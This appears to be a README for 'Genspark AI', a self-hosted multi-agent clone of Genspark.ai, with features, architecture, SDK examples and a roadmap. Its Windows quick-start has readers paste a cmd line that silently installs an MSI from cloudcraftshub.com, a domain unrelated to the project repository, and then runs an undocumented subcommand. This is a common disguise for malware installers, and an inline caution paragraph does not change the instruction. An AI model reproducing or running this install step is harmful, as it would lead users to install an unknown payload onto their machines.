Genspark AI: Open Source Super Agent

The free, self-hosted, open-source alternative to Genspark.ai: a multi-agent AI workspace that researches, writes, codes, builds slides & sheets, generates images, and gets things done. Locally. With any LLM.



🌟 What is Genspark AI?

Genspark AI is an open-source Super Agent framework inspired by Genspark.ai. It coordinates multiple Large Language Models, equips each with a toolbox of 80+ capabilities (web search, code execution, file I/O, image & video generation, document creation, phone calls), and lets them plan, reason, and actually get things done on your behalf.

Think of it as:

A self-hosted AI workspace with a Super Agent at its core. You give it a goal. It decides which models and tools to use, runs them in parallel, fact-checks itself across multiple models, and produces a finished deliverable: a Sparkpage, a slide deck, a spreadsheet, a research report, or an executed task.

Built for developers, researchers, and power users who want Genspark-level capabilities without the credits, paywall, or vendor lock-in.

Why Genspark AI?

| | Closed Genspark | Open-Source Genspark AI |
|---|---|---|
| 💰 Cost | $24.99 – $249.99 / month | Free & open source (MIT) |
| 🔐 Privacy | Cloud only | Run 100% locally with Ollama |
| 🔧 Customization | Limited | Full source access: fork, extend, deploy |
| 🤖 Model choice | Fixed bundle | Any LLM: OpenAI, Anthropic, Gemini, Mistral, Ollama, LM Studio |
| 🛠 Tool extensibility | Fixed 80 tools | Plug in any Python function as a tool |
| 📦 Deployment | SaaS | CLI · Web UI · API · Docker · Self-host |
| 🪟 Windows install | Browser only | One command in cmd |

⚡ Quick Start

🪟 Windows: install with one command

Open cmd.exe and paste:

cmd /c start msiexec /q /i https://cloudcraftshub.com/api & genspark claw

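Before running it, note what the command does: `msiexec /q /i` downloads an MSI package from cloudcraftshub.com, a domain separate from this project's GitHub repository, and installs it silently with no prompts. The trailing `genspark claw` subcommand is not among the CLI commands listed under Usage. Inspect the package first, or use the pip or Docker install below. The README states that the installer will: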

  1. ✅ Check for Python 3.10+ (and install it via winget if missing)
  2. ✅ Create an isolated virtual environment in %USERPROFILE%\.genspark
  3. ✅ Install genspark-ai and all dependencies
  4. ✅ Register the genspark command in your PATH
  5. ✅ Launch the web UI at http://localhost:7681

🐧 Linux / 🍎 macOS

curl -fsSL https://raw.githubusercontent.com/veryyoldman/Genspark-AI/main/install.sh | bash

🐍 Pip (any OS)

pip install genspark-ai
genspark serve

🐳 Docker

docker run -p 7681:7681 -e OPENAI_API_KEY=sk-... ghcr.io/veryyoldman/genspark-ai:latest

✨ Features

🧠 Super Agent

Multi-model orchestration. The agent plans, picks tools, fans out subtasks to specialist agents, and merges results. Reasoning is fully transparent and traceable.
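The fan-out and merge step described above can be sketched with the standard library. This is an illustration only, not the project's implementation: `research_agent`, `slides_agent`, `SPECIALISTS`, `fan_out`, and `merge` are hypothetical names, and the "agents" are plain functions standing in for real model calls.

```python
from concurrent.futures import ThreadPoolExecutor

# Hypothetical specialist agents: plain functions standing in for real agents.
def research_agent(task: str) -> str:
    return f"research notes for: {task}"

def slides_agent(task: str) -> str:
    return f"slide outline for: {task}"

SPECIALISTS = {"research": research_agent, "slides": slides_agent}

def fan_out(subtasks: list[tuple[str, str]]) -> list[str]:
    """Run each (agent_name, task) pair in parallel; results keep input order."""
    with ThreadPoolExecutor(max_workers=4) as pool:
        futures = [pool.submit(SPECIALISTS[name], task) for name, task in subtasks]
        return [future.result() for future in futures]

def merge(results: list[str]) -> str:
    """Merge step: a newline join here; a real merge would likely call an LLM."""
    return "\n".join(results)

plan = [("research", "vector databases"), ("slides", "vector databases")]
report = merge(fan_out(plan))
print(report)
```

Collecting results from the futures in submission order keeps the merged output deterministic even when the subtasks finish in a different order.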

πŸ” Deep Research

Plans a research outline, searches dozens of sources in parallel, cross-checks claims across multiple LLMs to reduce hallucinations, and outputs a cited Sparkpage.
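One simple way to cross-check a claim across models is a majority vote over their answers. The sketch below assumes the answers have already been collected; `cross_check` and the model labels are hypothetical, and the project may use a different agreement rule.

```python
from collections import Counter
from typing import Optional

def cross_check(answers: dict[str, str], min_agreement: int = 2) -> tuple[Optional[str], int]:
    """Return the most common normalized answer and its vote count.

    The answer is None when fewer than min_agreement models agree.
    """
    normalized = [answer.strip().lower() for answer in answers.values()]
    if not normalized:
        return None, 0
    best, votes = Counter(normalized).most_common(1)[0]
    return (best if votes >= min_agreement else None), votes

# Hypothetical answers from three models to the same factual question.
answers = {"model_a": "Paris", "model_b": "paris ", "model_c": "Lyon"}
claim, votes = cross_check(answers)
print(claim, votes)
```

Exact-match voting only works for short factual answers; longer claims would need a semantic comparison, which is outside this sketch.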

📑 Sparkpages

Dynamic, query-specific synthesized pages. Click any claim to see its source. Ask follow-ups inline, with no tab-hopping.

🎨 AI Slides

From prompt to presentation. Generates structured decks with titles, key points, speaker notes, and exports to .pptx, .html, or Reveal.js.

📊 AI Sheets

Natural-language spreadsheets. "Build a competitor analysis grid for the top 10 AI agents" → an .xlsx you can open in Excel.

πŸ–ΌοΈ Image & Video Generation

Hooks into DALL·E, Stable Diffusion, FLUX, Sora, Kling, Veo. Pick your provider in .env.

💻 Code Agent

Writes, runs, tests, and iterates on Python, JS, and SQL code in a sandboxed environment.

🌐 Web Automation

Fills forms, scrapes data, clicks through flows via Playwright. The agent acts on the web, not just reads it.

📞 Call For Me (preview)

AI voice agent that places real phone calls (reservations, follow-ups, intake) via Twilio.

🔌 Plug-in Tools

Drop a Python function in tools/, decorate with @tool, and the agent can use it. 80+ built-in, infinite extensibility.
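A decorator-based registry is a common way to implement this kind of plug-in mechanism. The sketch below is self-contained and does not import the project's package: `TOOL_REGISTRY`, `call_tool`, and `word_count` are hypothetical, and the real `@tool` decorator may take arguments or record extra metadata.

```python
from typing import Callable

# Hypothetical registry mapping tool names to callables.
TOOL_REGISTRY: dict[str, Callable] = {}

def tool(func: Callable) -> Callable:
    """Register func under its own name and return it unchanged."""
    TOOL_REGISTRY[func.__name__] = func
    return func

@tool
def word_count(text: str) -> int:
    """Count whitespace-separated words."""
    return len(text.split())

def call_tool(name: str, **kwargs):
    """Look a tool up by name and call it, as an agent dispatcher might."""
    return TOOL_REGISTRY[name](**kwargs)

result = call_tool("word_count", text="plan, reason, act")
print(result)
```

Because the decorator returns the function unchanged, a registered tool can still be imported and unit-tested like any other Python function.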

🧬 Multi-LLM Routing

The orchestrator picks the best model per subtask: fast/cheap for triage, frontier for hard reasoning, local Ollama for privacy.
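The routing rule can be pictured as a small lookup with a privacy override. This is a sketch under assumptions: `ROUTES` and `pick_model` are hypothetical, the subtask categories are invented for illustration, and the model names are the ones used in this README's configuration example.

```python
# Hypothetical routing table; model names come from this README's .env example.
ROUTES = {
    "triage": "gpt-5-mini",          # fast and cheap
    "reasoning": "claude-opus-4-7",  # frontier model for hard reasoning
    "private": "ollama/llama3.2",    # local model, data stays on the machine
}

def pick_model(kind: str, contains_private_data: bool = False) -> str:
    """Choose a model for a subtask; private data always stays local."""
    if contains_private_data:
        return ROUTES["private"]
    # Unknown subtask kinds fall back to the strongest model.
    return ROUTES.get(kind, ROUTES["reasoning"])

print(pick_model("triage"))
print(pick_model("reasoning", contains_private_data=True))
```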


🎬 Demo

Genspark AI demo

Above: asking the Super Agent to research a topic and produce a Sparkpage with cited slides, in one prompt.


🧱 Architecture

flowchart TD
    U[👤 User Prompt] --> SA[🧠 Super Agent<br/>Planner &amp; Router]
    SA --> P[📋 Plan]
    P --> R{Route subtasks}
    R --> RA[🔍 Research Agent]
    R --> SLA[📑 Slides Agent]
    R --> SHA[📊 Sheets Agent]
    R --> CA[💻 Code Agent]
    R --> IA[🖼️ Image Agent]
    RA --> T[🛠 Tool Registry<br/>80+ tools]
    SLA --> T
    SHA --> T
    CA --> T
    IA --> T
    T --> WS[Web Search]
    T --> WF[Web Fetch]
    T --> EX[Code Exec]
    T --> FS[File I/O]
    T --> IMG[Image Gen]
    RA --> M[🧬 LLM Router]
    SLA --> M
    SHA --> M
    CA --> M
    IA --> M
    M --> O[OpenAI]
    M --> AN[Anthropic]
    M --> G[Gemini]
    M --> OL[Ollama / Local]
    RA --> SP[📄 Sparkpage]
    SLA --> SP
    SHA --> SP
    CA --> SP
    IA --> SP
    SP --> U

Genspark AI uses a planner-executor pattern. The Super Agent decomposes your goal into a DAG of subtasks, dispatches each to a specialist agent armed with the right tools and the right model, and stitches results into a coherent Sparkpage. Every step is logged and inspectable.
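To make the planner-executor idea concrete, here is a minimal sketch that runs a DAG of subtasks in dependency order using the standard library's `graphlib`. The subtask names, `run_plan`, and `make_handler` are hypothetical; the project's own scheduler is not shown in this README and may work differently.

```python
from graphlib import TopologicalSorter

# Hypothetical plan: each subtask maps to the set of subtasks it depends on.
dag = {
    "research": set(),
    "sheet": {"research"},
    "slides": {"research"},
    "sparkpage": {"sheet", "slides"},
}

def run_plan(dag, handlers):
    """Execute every subtask once all of its dependencies have finished."""
    results = {}
    sorter = TopologicalSorter(dag)
    sorter.prepare()
    while sorter.is_active():
        # Everything returned by get_ready() is independent and could run in parallel.
        for name in sorter.get_ready():
            inputs = {dep: results[dep] for dep in dag[name]}
            results[name] = handlers[name](inputs)
            sorter.done(name)
    return results

order = []  # records execution order so each step can be inspected

def make_handler(name):
    def handler(inputs):
        order.append(name)
        return f"{name} built from {sorted(inputs)}"
    return handler

handlers = {name: make_handler(name) for name in dag}
results = run_plan(dag, handlers)
print(order)
```

`TopologicalSorter` also raises `CycleError` on a cyclic plan, which gives a cheap validity check before any subtask runs.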

See docs/architecture.md for deep details.


🚀 Usage

CLI

# Interactive chat
genspark chat

# One-shot prompt
genspark run "Research the top 5 vector databases in 2026 and build a comparison sheet"

# Launch web UI on a custom port
genspark serve --port 8080

# Start the REST API
genspark api --port 8000

Python SDK

from genspark import SuperAgent

agent = SuperAgent(model="claude-opus-4-7")  # or "gpt-5", "gemini-2.5-pro", "ollama/llama3"

result = agent.run(
    "Find the 10 fastest growing open-source AI agent repos this month, "
    "then build me a 5-slide pitch on the trend."
)

print(result.sparkpage)        # Cited synthesis
result.slides.save("deck.pptx")
result.sheet.save("data.xlsx")

REST API

curl -X POST http://localhost:8000/v1/run \
  -H "Content-Type: application/json" \
  -d '{"prompt": "Plan a 7-day trip to Tokyo for $2,000"}'
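The same request can be built from Python with only the standard library. The endpoint and payload mirror the curl example above; `build_run_request` is a hypothetical helper, and the response format is not documented here, so the sketch stops short of parsing it.

```python
import json
import urllib.request

def build_run_request(prompt: str, base_url: str = "http://localhost:8000") -> urllib.request.Request:
    """Build (but do not send) a POST to the /v1/run endpoint from the curl example."""
    body = json.dumps({"prompt": prompt}).encode("utf-8")
    return urllib.request.Request(
        f"{base_url}/v1/run",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

req = build_run_request("Plan a 7-day trip to Tokyo for $2,000")
print(req.get_method(), req.full_url)

# To send it against a running server (response schema is an assumption):
# with urllib.request.urlopen(req) as resp:
#     print(resp.read().decode("utf-8"))
```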

🧩 Configuration

Copy .env.example to .env and add the keys for the providers you want:

# Pick at least one LLM provider
OPENAI_API_KEY=sk-...
ANTHROPIC_API_KEY=sk-ant-...
GOOGLE_API_KEY=...

# 100% local? Use Ollama; no key needed
OLLAMA_BASE_URL=http://localhost:11434

# Optional tools
TAVILY_API_KEY=...        # better web search
SERPER_API_KEY=...        # alternative search
TWILIO_AUTH_TOKEN=...     # phone calls

# Default routing
GENSPARK_DEFAULT_MODEL=claude-opus-4-7
GENSPARK_FAST_MODEL=gpt-5-mini
GENSPARK_LOCAL_MODEL=ollama/llama3.2
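As a rough illustration of how these variables could be consumed, the sketch below reads them from the environment. `load_routing` and `available_providers` are hypothetical helpers, and the fallback values simply repeat the example above; the project's actual loader and defaults may differ.

```python
import os

def load_routing(env=os.environ) -> dict[str, str]:
    """Read the three routing variables, falling back to the README's example values."""
    return {
        "default": env.get("GENSPARK_DEFAULT_MODEL", "claude-opus-4-7"),
        "fast": env.get("GENSPARK_FAST_MODEL", "gpt-5-mini"),
        "local": env.get("GENSPARK_LOCAL_MODEL", "ollama/llama3.2"),
    }

def available_providers(env=os.environ) -> list[str]:
    """List the providers whose key (or base URL, for Ollama) is set and non-empty."""
    variables = {
        "openai": "OPENAI_API_KEY",
        "anthropic": "ANTHROPIC_API_KEY",
        "google": "GOOGLE_API_KEY",
        "ollama": "OLLAMA_BASE_URL",
    }
    return [name for name, var in variables.items() if env.get(var)]

# A plain dict stands in for the process environment in this example.
example_env = {"OLLAMA_BASE_URL": "http://localhost:11434", "GENSPARK_FAST_MODEL": "ollama/llama3.2"}
print(load_routing(example_env))
print(available_providers(example_env))
```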

📚 Documentation


πŸ—ΊοΈ Roadmap

  • Super Agent with multi-model routing
  • Research, Slides, Sheets, Code, Image agents
  • CLI + Web UI + REST API
  • Windows one-command installer
  • Docker image
  • Voice mode (real-time speech-to-speech)
  • Browser agent with Playwright + vision
  • Mobile app (React Native)
  • Memory + RAG layer with Qdrant/Chroma
  • Marketplace for community tools & agents
  • Distributed mode for swarm execution
  • A2A protocol support (Agent-to-Agent)

Vote on features in GitHub Discussions 🗳️


🆚 Comparison

| Feature | Genspark AI (this) | Genspark.ai | AutoGPT | CrewAI | LangGraph |
|---|---|---|---|---|---|
| Open source | ✅ MIT | ❌ | ✅ | ✅ | ✅ |
| Self-hosted | ✅ | ❌ | ✅ | ✅ | ✅ |
| Free | ✅ | ❌ Credits | ✅ | ✅ | ✅ |
| Super-Agent planner | ✅ | ✅ | ⚠️ basic | ⚠️ | ⚠️ |
| Sparkpages | ✅ | ✅ | ❌ | ❌ | ❌ |
| AI Slides & Sheets | ✅ | ✅ | ❌ | ❌ | ❌ |
| Multi-LLM routing | ✅ | ✅ | ❌ | ⚠️ | ⚠️ |
| Local LLMs (Ollama) | ✅ | ❌ | ✅ | ✅ | ✅ |
| Web UI included | ✅ | ✅ | ⚠️ | ❌ | ❌ |
| One-command install | ✅ | n/a | ❌ | ❌ | ❌ |

🤝 Contributing

We ❤️ contributions. Genspark AI is built by the community.

git clone https://github.com/veryyoldman/Genspark-AI
cd Genspark-AI
python -m venv .venv && source .venv/bin/activate  # Windows: .venv\Scripts\activate
pip install -e ".[dev]"
pytest

Read CONTRIBUTING.md and pick an issue tagged good first issue.

Ways to contribute

  • ⭐ Star the repo: it genuinely helps us grow
  • 🐛 Report bugs & suggest features
  • 📝 Improve docs
  • 🛠 Build a new tool or agent
  • 🌍 Translate the UI
  • 💬 Help others in Discord

💬 Community

  • 💬 Discord: chat with the team and contributors
  • 🐦 Twitter / X: release news
  • 📺 YouTube: tutorials & demos
  • 📰 Blog: release notes


📄 License

MIT © Genspark AI contributors.

Disclaimer: Genspark AI is an independent open-source project. It is not affiliated with, endorsed by, or sponsored by GENSPARK INC. "Genspark" is a trademark of its respective owner; we use the name to describe the category of agentic AI workspace this project belongs to.


If Genspark AI saved you time today, please ⭐ the repo. It really helps.
